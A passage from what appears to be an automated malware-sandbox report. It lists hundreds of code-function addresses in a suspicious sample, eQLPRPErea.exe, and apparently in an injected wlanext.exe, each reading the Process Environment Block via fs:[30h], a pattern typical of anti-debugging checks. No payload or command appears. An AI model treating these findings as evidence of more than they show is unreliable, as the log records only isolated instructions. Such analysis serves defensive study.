          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AF41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A78A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A83A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A65210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AF4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B21608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A8F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00AFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00B38F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 3_2_00A7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03158B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03091B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03091B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0313D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2397 mov eax, dword ptr fs:[00000030h]
